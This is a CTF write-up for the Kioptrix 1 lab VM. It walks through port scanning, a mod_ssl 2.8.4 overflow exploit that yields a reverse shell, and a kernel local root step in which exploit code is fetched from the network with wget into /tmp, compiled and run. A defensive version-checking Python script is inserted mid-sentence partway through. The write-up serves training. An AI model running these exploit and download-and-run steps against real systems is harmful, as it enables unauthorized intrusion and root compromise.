Kioptrix 1 is a beginner-level CTF challenge. It can be downloaded from VulnHub. The objective of this challenge is to get root access on the machine. In this write-up, I will show how I achieved this objective.

Note: In order to keep all my CTF write-ups crisp and concise, I only mention the steps which led me to positive results. During the course of solving a CTF there is a lot of trial and error, hours or in some cases even days of failed attempts and falling into rabbit holes before reaching the correct solution. I strongly recommend trying the challenges on your own before moving on to see the solutions. This will help you learn a lot of extra new things and it will give you an immense sense of satisfaction.

My lab setup consists of Kali Linux (referred to as the attacker) running in VMware Player with the network adapter set to NAT. The network setting of the downloaded VM (referred to as the victim) is changed (if not already) to NAT, so that the attacker and victim machines sit on the same isolated NAT network. I approach every challenge with the typical penetration testing methodology of Reconnaissance, Exploitation and Post Exploitation.

Reconnaissance

After booting up the VM, the first task is to find its IP address. My Kali box and the Kioptrix VM are on the same network (both adapters are set to NAT). I started by checking my Kali IP address using ifconfig; the IP address of my Kali machine is 192.168.57.137. I then scanned the whole network for live hosts using netdiscover:

netdiscover -r 192.168.57.0/24

The IP address of the victim is 192.168.57.136.

Now it is time for port scanning. I used nmap to perform a SYN scan (-sS) of all 65535 ports (-p-), detect the versions of the running services (-A, which also runs the default scripts and a traceroute) and the OS (-O). The result is displayed in verbose mode (-v).

nmap -sS -p- -v -A -O 192.168.57.136

The scan result showed that the victim is running a web server on ports 80 and 443.

Exploitation

We can see the web server is Apache with mod_ssl/2.8.4. mod_ssl is the module that provides strong cryptography for the Apache web server by encrypting traffic using SSL/TLS. The mod_ssl/2.8.4 – mod_ssl 2.8.7 range is infamous for vulnerabilities. A quick Google search for mod_ssl/2.8.4 shows that it is vulnerable to a buffer overflow attack which can allow an attacker to execute arbitrary commands. We will be exploiting this vulnerability to get a shell on the victim box.

The exploit for this vulnerability on Exploit-DB is quite old and requires some modification to make it work. The updated exploit can be obtained from my GitHub repository. Clone or download the repository and copy the file "openfuck.c". "openfuck.c" exploits the buffer overflow vulnerability in the mod_ssl/2.8.4 package and gives us a reverse shell. Successful compilation requires the libssl-dev library; install it if not present using apt-get install libssl-dev.

Compile the code:

gcc -o openfuck openfuck.c -lcrypto

Run the exploit by providing the victim's IP (here 192.168.57.136) and port (443). After some trial and error, I came up with the correct parameters:

./openfuck 0x6b 192.168.57.136 443 -c 45

Now we have a shell on the victim 🙂

Post Exploitation

Let's do some information gathering on the victim.

The shell we got runs as the 'apache' user, which has limited privileges. Our objective is to obtain 'root', so from here we need to escalate privileges.

Check the kernel version using 'uname -a'.

Linux kernel 2.4.7 is vulnerable to a local root exploit. This will allow us to escalate our privileges to root. We download the exploit to the '/tmp' directory on the victim:
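Both version checks in this write-up, the mod_ssl/2.8.4 banner returned by the nmap scan in the Exploitation section and the 2.4.7 kernel from uname -a here, are exactly what a defender wants to run over inventory data before anyone else does. The script below is an added example of mine, not code from the original post or from the Kioptrix project. It parses one line of nmap grepable (-oG) output and one uname -a string, both constructed samples, and flags mod_ssl older than 2.8.7 (the release that fixed this overflow) and a 2.4 kernel older than 2.4.21 (my assumed threshold for the local root hole, which the post does not name; change KERNEL_24_FIXED if you track a different one). All function names are mine.

```python
import re

# Fixed versions for the two checks.  mod_ssl 2.8.7 closed the remote
# overflow the write-up exploits.  The kernel threshold is an assumption
# for illustration: 2.4.x kernels before 2.4.21 carry the ptrace local
# root hole widely used against Red Hat systems of this era.
MOD_SSL_FIXED = (2, 8, 7)
KERNEL_24_FIXED = (2, 4, 21)

# Constructed sample inputs (not copied from the write-up's screenshots).
# In nmap -oG output each port entry is port/state/proto/owner/service/rpc/version/
# and any '/' inside the service or version text is written as '|'.
NMAP_GREPABLE_LINE = (
    "Host: 192.168.57.136 ()\tPorts: "
    "80/open/tcp//http//Apache httpd ((Unix) mod_ssl|2.8.4)/, "
    "443/open/tcp//ssl|https//Apache httpd ((Unix) mod_ssl|2.8.4)/, "
    "139/filtered/tcp//netbios-ssn///"
    "\tIgnored State: closed (65532)"
)
UNAME_A_OUTPUT = "Linux victim 2.4.7-10 #1 Mon Jan 1 12:00:00 EST 2001 i686 unknown"


def version_tuple(text):
    """'2.8.4' -> (2, 8, 4); '2.4.7-10' -> (2, 4, 7) (distro suffix dropped).
    Comparing tuples avoids the string-compare trap where '2.8.10' < '2.8.7'."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError("no version number in %r" % text)
    return tuple(int(p) for p in m.group(0).split("."))


def parse_nmap_grepable(line):
    """Parse one 'Host: ... Ports: ...' line of nmap -oG output."""
    m = re.match(r"Host:\s+(\S+)\s+\((.*?)\)\s+Ports:\s+([^\t]*)", line)
    if not m:
        raise ValueError("not an nmap -oG Host/Ports line")
    host, hostname, ports_field = m.groups()
    ports = []
    for entry in ports_field.split(", "):
        if entry.endswith("/"):          # drop only the single trailing separator;
            entry = entry[:-1]           # rstrip('/') would also eat empty fields
        fields = entry.split("/")
        if len(fields) != 7:
            continue                     # malformed entry: skip, don't abort the summary
        port, state, proto, _owner, service, _rpc, version = fields
        ports.append({
            "port": int(port), "state": state, "proto": proto,
            "service": service.replace("|", "/"),
            "version": version.replace("|", "/"),
        })
    return {"host": host, "hostname": hostname, "ports": ports}


def mod_ssl_version(version_text):
    """Return the mod_ssl version tuple from a service banner, or None if absent."""
    m = re.search(r"mod_ssl/(\d+(?:\.\d+)+)", version_text)
    return version_tuple(m.group(1)) if m else None


def kernel_version(uname_a):
    """Kernel release from 'uname -a': third field, e.g. '2.4.7-10' -> (2, 4, 7)."""
    parts = uname_a.split()
    if len(parts) < 3 or parts[0] != "Linux":
        raise ValueError("expected 'uname -a' output from a Linux host")
    return version_tuple(parts[2])


def outdated_findings(nmap_line, uname_a):
    """Run both checks and return a list of human-readable findings."""
    findings = []
    rec = parse_nmap_grepable(nmap_line)
    for p in rec["ports"]:
        v = mod_ssl_version(p["version"]) if p["state"] == "open" else None
        if v is not None and v < MOD_SSL_FIXED:
            findings.append("%s:%d/%s mod_ssl %s is older than 2.8.7"
                            % (rec["host"], p["port"], p["proto"], ".".join(map(str, v))))
    k = kernel_version(uname_a)
    if k[:2] == (2, 4) and k < KERNEL_24_FIXED:
        findings.append("kernel %s is a 2.4 release older than 2.4.21"
                        % ".".join(map(str, k)))
    return findings


if __name__ == "__main__":
    for f in outdated_findings(NMAP_GREPABLE_LINE, UNAME_A_OUTPUT):
        print("[!]", f)
```

Feed it real data with `nmap -sV -oG scan.gnmap` and the output of `uname -a` from each host; the numeric tuple comparison is the important detail, since a naive string comparison would call 2.8.10 older than 2.8.7.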

wget -O /tmp/3.c https://www.exploit-db.com/download/3/

Compile the exploit and run it:

gcc -o /tmp/3 /tmp/3.c
/tmp/3

And we are done! Now we have root access on the victim 😀

I hope this write-up was helpful. Share it if you found it useful. If you have any questions please leave your comments. Subscribe to the mailing list to get updates on my future CTF write-ups and blogs.

Happy Learning 🙂